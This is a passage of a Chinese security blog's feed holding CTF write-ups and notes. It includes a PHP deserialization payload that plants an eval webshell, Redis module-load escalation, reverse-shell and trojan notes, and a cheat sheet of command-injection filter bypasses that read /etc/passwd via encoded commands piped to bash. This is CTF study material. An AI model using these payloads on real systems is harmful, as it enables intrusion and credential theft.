class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> request_data:<br> client_socket.close()<br> <span class="hljs-keyword">return</span><br><br> <span class="hljs-keyword">with</span> socket.socket(socket.AF_INET, socket.SOCK_STREAM) <span class="hljs-keyword">as</span> proxy_socket:<br> proxy_socket.connect((<span class="hljs-variable language_">self</span>.target_host, <span class="hljs-variable language_">self</span>.target_port))<br> proxy_socket.sendall(request_data)<br><br> response_data = <span class="hljs-string">b""</span><br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> chunk = proxy_socket.recv(<span class="hljs-number">4096</span>)<br> <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> chunk:<br> <span class="hljs-keyword">break</span><br> response_data += chunk<br><br> header_end = response_data.rfind(<span class="hljs-string">b"\r\n\r\n"</span>)<br> <span class="hljs-keyword">if</span> header_end != -<span class="hljs-number">1</span>:<br> body = response_data[header_end + <span class="hljs-number">4</span>:]<br> <span class="hljs-keyword">else</span>:<br> body = response_data<br> <br> response_body = body<br> response = <span class="hljs-string">b"HTTP/1.1 200 OK\r\n"</span> \<br> <span class="hljs-string">b"Content-Length: "</span> + <span class="hljs-built_in">str</span>(<span class="hljs-built_in">len</span>(response_body)).encode() + <span class="hljs-string">b"\r\n"</span> \<br> <span class="hljs-string">b"Content-Type: text/html; charset=utf-8\r\n"</span> \<br> <span class="hljs-string">b"\r\n"</span> + response_body<br><br> client_socket.sendall(response)<br> <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Proxy Error: <span class="hljs-subst">{e}</span>"</span>)<br> <span class="hljs-keyword">finally</span>:<br> client_socket.close()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">start_proxy_server</span>(<span class="hljs-params">host, port, target_host, target_port</span>):<br> proxy_handler = HTTPProxyHandler(target_host, target_port)<br> server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br> server_socket.bind((host, port))<br> server_socket.listen(<span class="hljs-number">100</span>)<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Proxy server is running on <span class="hljs-subst">{host}</span>:<span class="hljs-subst">{port}</span> and forwarding to <span class="hljs-subst">{target_host}</span>:<span class="hljs-subst">{target_port}</span>..."</span>)<br><br> <span class="hljs-keyword">try</span>:<br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> client_socket, addr = server_socket.accept()<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">f"Connection from <span class="hljs-subst">{addr}</span>"</span>)<br> thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))<br> thread.daemon = <span class="hljs-literal">True</span><br> thread.start()<br> <span class="hljs-keyword">except</span> KeyboardInterrupt:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Shutting down proxy server..."</span>)<br> <span class="hljs-keyword">finally</span>:<br> server_socket.close()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">run_flask_app</span>():<br> app.run(debug=<span class="hljs-literal">False</span>, host=<span class="hljs-string">'127.0.0.1'</span>, port=<span class="hljs-number">5000</span>)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>:<br> proxy_host = <span class="hljs-string">"0.0.0.0"</span><br> proxy_port = <span class="hljs-number">5001</span><br> target_host = <span class="hljs-string">"127.0.0.1"</span><br> target_port = <span class="hljs-number">5000</span><br><br> <span class="hljs-comment"># 安全反代,防止针对响应头的攻击</span><br> proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))<br> proxy_thread.daemon = <span class="hljs-literal">True</span><br> proxy_thread.start()<br><br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"Starting Flask app..."</span>)<br> run_flask_app()<br><br><br><br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>鼓起勇气面对ciscn,慢慢的对着wp复现,加油加油加油</p>
<h2 id="web"><a href="#web" class="he</summary>
<category term="CTF" scheme="https://fogpost.top/categories/CTF/"/>
<category term="ctf" scheme="https://fogpost.top/tags/ctf/"/>
</entry>
<entry>
<title>bypass</title>
<link href="https://fogpost.top/2025/01/09/bypass/"/>
<id>https://fogpost.top/2025/01/09/bypass/</id>
<published>2025-01-09T02:43:20.000Z</published>
<updated>2025-01-11T02:49:07.679Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>在长城杯上偶遇未知bypass,拼劲全力无法战胜,特此来修炼</p><h2 id="天翼杯-2021-esay-eval"><a href="#天翼杯-2021-esay-eval" class="headerlink" title="[天翼杯 2021]esay_eval"></a><a href="https://www.nssctf.cn/problem/364">[天翼杯 2021]esay_eval</a></h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">A</span></span>{<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$code</span> = <span class="hljs-string">""</span>;<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$method</span>,<span class="hljs-variable">$args</span></span>)</span>{<br> <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>->code);<br> <br> }<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->code = <span class="hljs-string">""</span>;<br> }<br>}<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">B</span></span>{<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>->a-><span class="hljs-title function_ invoke__">a</span>();<br> }<br>}<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>])){<br> <span class="hljs-title function_ invoke__">preg_match_all</span>(<span class="hljs-string">'/"[BA]":(.*?):/s'</span>,<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>],<span class="hljs-variable">$ret</span>);<br> <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$ret</span>[<span class="hljs-number">1</span>])) {<br> <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$ret</span>[<span class="hljs-number">1</span>] <span class="hljs-keyword">as</span> <span class="hljs-variable">$i</span>) {<br> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$i</span>)!==<span class="hljs-number">1</span>){<br> <span class="hljs-keyword">exit</span>(<span class="hljs-string">"you want to bypass wakeup ? no !"</span>);<br> }<br> }<br> <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">'poc'</span>]); <br> }<br><br><br>}<span class="hljs-keyword">else</span>{<br> <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>} <br></code></pre></td></tr></table></figure><p>首先会对传入的参数做一个正则匹配,匹配A类和B类名字后面的数目,要求必须为1,而我们要绕过<br>wakeup需要大于1,这里利用php对类名大小写不敏感的特性去绕过,payload</p><p>so easy 的一个反序列化,要注意一个点,利用php对类名大小写不敏感的特性去绕过题目中的正则表达式,在构造payload的时候,将类名换为a,b;</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">a</span></span>{<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$code</span> = <span class="hljs-string">""</span>;<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>{<br><span class="hljs-comment">//$this->code="phpinfo();";</span><br> <span class="hljs-variable language_">$this</span>->code=<span class="hljs-string">"eval(\$_GET['pass']);"</span>;<span class="hljs-comment">//写个🐎进去</span><br>}<br><br>}<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">b</span></span>{<br> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->a=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">a</span>();<br> }<br>}<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">b</span>());<br><span class="hljs-comment"># 最后改一下b类属性的数量,让其不为1,触发wakeup魔术方法</span><br><span class="hljs-comment">#O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}</span><br><span class="hljs-comment">#改成O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}</span><br><br>O:<span class="hljs-number">1</span>:<span class="hljs-string">"b"</span>:<span class="hljs-number">2</span>:{s:<span class="hljs-number">1</span>:<span class="hljs-string">"a"</span>;O:<span class="hljs-number">1</span>:<span class="hljs-string">"a"</span>:<span class="hljs-number">1</span>:{s:<span class="hljs-number">4</span>:<span class="hljs-string">"code"</span>;s:<span class="hljs-number">21</span>:<span class="hljs-string">"eval(<span class="hljs-subst">$_POST</span>['pass']);"</span>;}}<br><br></code></pre></td></tr></table></figure><p>蚁剑连接<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091121732.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091120750.png" srcset="/img/loading.gif" lazyload><br>发现权限不足,尝试使用蚁剑的插件,暴力绕过<br>disable_functions,Antsword插件<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091213124.png" srcset="/img/loading.gif" lazyload></p><p>同时发现这个是个swp文件,这是vim缓存泄露的文件,尝试恢复一下</p><blockquote><p>在开发人员使用 vim 编辑器 编辑文本时,系统会自动生成一个备份文件,当编辑完成后,保存时,原文件会更新,备份文件会被自动删除。<br>但是,当编辑操作意外终止时,这个备份文件就会保留,如果多次编辑文件都意外退出,备份文件并不会覆盖,而是以 swp、swo、swn 等其他格式,依次备份。</p></blockquote><p>利用vim来恢复 vim -r XXXX.php.swp<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091224047.png" srcset="/img/loading.gif" lazyload><br>在这里发现了REDIS的配置文件,尝试连接</p><p>这里要下载exp.so文件,并进行利用,简单解释一下exp.so文件</p><blockquote><p>Redis 中的 exp.so 文件通常被用作 Redis 提权的一种方式。这个文件是一个 Redis 模块,它可以在 Redis 服务器中执行任意代码。<br>Redis 模块是一种可插拔的扩展,它允许用户在 Redis 服务器中添加新的功能。exp.so 文件是一个 Redis 模块,它提供了一些命令和功能,可以让攻击者在 Redis 服务器中执行任意代码,从而获得服务器的控制权。<br>在 Redis 提权攻击中,攻击者通常会利用 Redis 的漏洞或者弱密码,获取 Redis 服务器的访问权限。一旦攻击者获得了访问权限,他们就可以上传 exp.so 文件到 Redis 服务器中,并使用 Redis 的 module load 命令加载这个文件。这个文件会在 Redis 服务器中执行任意代码,从而让攻击者获得服务器的控制权</p></blockquote><p>EXP.SO:<a href="https://github.com/Dliv3/redis-rogue-server">https://github.com/Dliv3/redis-rogue-server</a></p><p>然后用redis提权<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091255627.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091256738.png" srcset="/img/loading.gif" lazyload><br>随便选择一个,执行命令,利用module load 命令加载这个文件,然后才能进行RCE,所以在虚拟命令行输入MODULE LOAD /var/www/html/exp.so<br>然后我们就可以进行命令执行了,即可查看flag<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091257489.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>在长城杯上偶遇未知bypass,拼劲全力无法战胜,特此来修炼</p>
<h2 id="天翼杯-2021-esay-eval"><a href</summary>
<category term="CTF" scheme="https://fogpost.top/categories/CTF/"/>
<category term="ctf" scheme="https://fogpost.top/tags/ctf/"/>
</entry>
<entry>
<title>nc监听端口和反弹shell</title>
<link href="https://fogpost.top/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/"/>
<id>https://fogpost.top/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/</id>
<published>2025-01-05T12:28:03.000Z</published>
<updated>2025-01-11T02:49:31.998Z</updated>
<content type="html"><![CDATA[<p>nc [-hlnruz] [-g<网关…>] [-G<指向器数目>] [-i<延迟秒数>] [-o<输出文件>] [-p<通信端口>] [-s<来源位址>] [-v…] [-w<超时秒数>] [主机名称] [通信端口…]</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052042662.png" srcset="/img/loading.gif" lazyload></p><p>注意再使用nc的-l时连接成功不会有明显的回显,但是这个时候可能已经连接上了<br><img src="https://gitee.com/fogpost/photo/raw/master/202501052046913.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501052047210.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<summary type="html"><p>nc [-hlnruz] [-g&lt;网关…&gt;] [-G&lt;指向器数目&gt;] [-i&lt;延迟秒数&gt;] [-o&lt;输出文件&gt;] [-p&lt;通信端口&gt;] [-s&lt;来源位址&gt;] [-v…] [-w&lt;超时秒数&gt;]</summary>
<category term="WEB" scheme="https://fogpost.top/categories/WEB/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>简单的远控木马啊</title>
<link href="https://fogpost.top/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/"/>
<id>https://fogpost.top/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/</id>
<published>2025-01-05T12:19:19.000Z</published>
<updated>2025-01-11T02:50:03.167Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>玩玩木马</p><h2 id="利用kali生成"><a href="#利用kali生成" class="headerlink" title="利用kali生成"></a>利用kali生成</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052023460.png" srcset="/img/loading.gif" lazyload></p><p>参数含义:-p:payload 载荷 目标操作系统类型/系统位数/获取目标的控制权限/使靶机连接至攻击机 -f:format 文件格式 -o:output 输出文件</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052058694.png" srcset="/img/loading.gif" lazyload><br>配置攻击模块</p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>玩玩木马</p>
<h2 id="利用kali生成"><a href="#利用kali生成" class="headerlink" titl</summary>
<category term="渗透测试" scheme="https://fogpost.top/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>webtest</title>
<link href="https://fogpost.top/2025/01/05/webtest/"/>
<id>https://fogpost.top/2025/01/05/webtest/</id>
<published>2025-01-05T12:13:40.000Z</published>
<updated>2025-01-05T12:18:58.845Z</updated>
<content type="html"><![CDATA[<h1 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h1><figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]][([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+([][[]]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+([][[]]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]((<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]])()<br></code></pre></td></tr></table></figure><p>这一段是alert(1),再开发者工具的console(控制台)中运行即可。</p>]]></content>
<summary type="html"><h1 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h1><figure class="highlight scheme"><table><tr><td class="gu</summary>
</entry>
<entry>
<title>day01</title>
<link href="https://fogpost.top/2025/01/02/day01/"/>
<id>https://fogpost.top/2025/01/02/day01/</id>
<published>2025-01-02T12:59:16.000Z</published>
<updated>2025-01-02T13:00:06.000Z</updated>
<content type="html"><![CDATA[<h1 id="新刊blog,堂堂连载"><a href="#新刊blog,堂堂连载" class="headerlink" title="新刊blog,堂堂连载"></a>新刊blog,堂堂连载</h1>]]></content>
<summary type="html"><h1 id="新刊blog,堂堂连载"><a href="#新刊blog,堂堂连载" class="headerlink" title="新刊blog,堂堂连载"></a>新刊blog,堂堂连载</h1></summary>
</entry>
<entry>
<title>waf绕过总结</title>
<link href="https://fogpost.top/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/"/>
<id>https://fogpost.top/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/</id>
<published>2024-12-11T07:39:59.000Z</published>
<updated>2025-01-11T02:46:15.332Z</updated>
<content type="html"><![CDATA[<h1 id="waf绕过总结"><a href="#waf绕过总结" class="headerlink" title="waf绕过总结"></a>waf绕过总结</h1><h2 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h2><p>在ping的过程中一些地方可以在后方利用;或者|直接进行命令执行,但这时便会遇到一些相关方面的waf也就是阻拦,我们需要绕过这些waf</p><h2 id="空格绕过:"><a href="#空格绕过:" class="headerlink" title="空格绕过:"></a>空格绕过:</h2><p>在bash下可以用$IFS、${IFS}、$IFS$9、%09、<、>、<>、{,}(例如{cat,/etc/passwd} )、%20(space)、%09(tab)</p><h2 id="命令执行函数system-绕过"><a href="#命令执行函数system-绕过" class="headerlink" title="命令执行函数system()绕过"></a>命令执行函数system()绕过</h2><p>系统命令函数system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反引号(·) 同shell_exec()用以上函数都可进行绕过。</p><h2 id="命令链接符:"><a href="#命令链接符:" class="headerlink" title="命令链接符:"></a>命令链接符:</h2><p>Windows和Linux都支持的命令连接符:<br>cmd1 | cmd2 只执行cmd2<br>cmd1 || cmd2 只有当cmd1执行失败后,cmd2才被执行<br>cmd1 & cmd2 先执行cmd1,不管是否成功,都会执行cmd2<br>cmd1 && cmd2 先执行cmd1,cmd1执行成功后才执行cmd2,否则不执行cmd2<br>Linux还支持分号(;),cmd1;cmd2 按顺序依次执行,先执行cmd1再执行cmd2 </p><h2 id="正则匹配绕过"><a href="#正则匹配绕过" class="headerlink" title="正则匹配绕过"></a>正则匹配绕过</h2><h3 id="双写绕过"><a href="#双写绕过" class="headerlink" title="双写绕过"></a>双写绕过</h3><p>普通的正则只会匹配一次,所以我们可以双写绕过。pphphp,只会过滤掉中间的php剩下来的部分可以组成第二个php,phpphpinfoinfo,同理。</p><h3 id="利用变量绕过"><a href="#利用变量绕过" class="headerlink" title="利用变量绕过"></a>利用变量绕过</h3><p>a=c;b=a;c=t;<br>$a$b$c /etc/passwd</p><h3 id="利用base编码绕过"><a href="#利用base编码绕过" class="headerlink" title="利用base编码绕过"></a>利用base编码绕过</h3><p>echo ‘cat’ | base64<br>Y2F0wqAK<br><code>echo 'Y2F0wqAK' | base64 -d</code> /etc/passwd<br>echo ‘Y2F0IC9ldGMvcGFzc3dk’ | base64 -d | bash // cat /etc/passwd </p><h3 id="利用hex编码绕过"><a href="#利用hex编码绕过" class="headerlink" title="利用hex编码绕过"></a>利用hex编码绕过</h3><p>echo “636174202F6574632F706173737764” | xxd -r -p|bash // hex编码后的0x不需要输入</p><h3 id="利用oct编码(八进制)绕过"><a href="#利用oct编码(八进制)绕过" class="headerlink" title="利用oct编码(八进制)绕过"></a>利用oct编码(八进制)绕过</h3><p>$(printf “\154\163”) //ls命令</p><h3 id="利用16进制编码绕过"><a href="#利用16进制编码绕过" class="headerlink" title="利用16进制编码绕过"></a>利用16进制编码绕过</h3><p>“\x73\x79\x73\x74\x65\x6d”(“cat /etc/passwd”)</p><h3 id="利用拼接绕过"><a href="#利用拼接绕过" class="headerlink" title="利用拼接绕过"></a>利用拼接绕过</h3><p>(sy.(st).em)(whoami);//<br>c’’a’’t /etc/passwd//单引<br>c””a””t /etc/passwd//双引<br>c<code>a</code>t /etc/passwd/反单引<br>c\a\t /etc/passwd//反斜线<br>$*和$@,$x(x 代表 1-9),${x}(x>=10) :<br>比如ca${21}t a.txt表示cat a.txt 在没有传入参数的情况下,这些特殊字符默认为空,如下:<br>wh$1oami<br>who$@ami<br>whoa$*mi<br>666<code>whoami</code>666 //bash: 666root666: command not found<br>666<code>\whoami</code>666 //bash: 666root666: command not found<br>//命令执行后的结果在2个666中间 </p><h3 id="插入注释"><a href="#插入注释" class="headerlink" title="插入注释"></a>插入注释</h3><p>(这对于绕过阻止特定PHP函数名称的WAF规则集很有用)<br>system/<em>A10ng_</em>/(whoami);<br>system/<em>A10ng_</em>/(wh./<em>A10ng_</em>/(oa)/<em>caixukun</em>/.mi);<br>(sy./<em>A10ng_</em>/(st)/<em>A10ng_</em>/.em)/<em>A10ng_</em>/(wh./<em>A10ng_</em>/(oa)/<em>A10ng_</em>/.mi);</p><h3 id="利用未初始化变量"><a href="#利用未初始化变量" class="headerlink" title="利用未初始化变量"></a>利用未初始化变量</h3><p>cat$u /etc/passwd<br>cat /etc$u/passwd</p><h3 id="过滤了斜杠’-‘"><a href="#过滤了斜杠’-‘" class="headerlink" title="过滤了斜杠’/‘"></a>过滤了斜杠’/‘</h3><p>可利用’;’拼接命令绕过<br>cd ..;cd ..;cd ..;cd ..;cd etc;cat passwd</p><h3 id="利用通配符绕过"><a href="#利用通配符绕过" class="headerlink" title="利用通配符绕过"></a>利用通配符绕过</h3><p>cat /passwd:<br>??? /e??/?a????</p><h3 id="利用path绕过"><a href="#利用path绕过" class="headerlink" 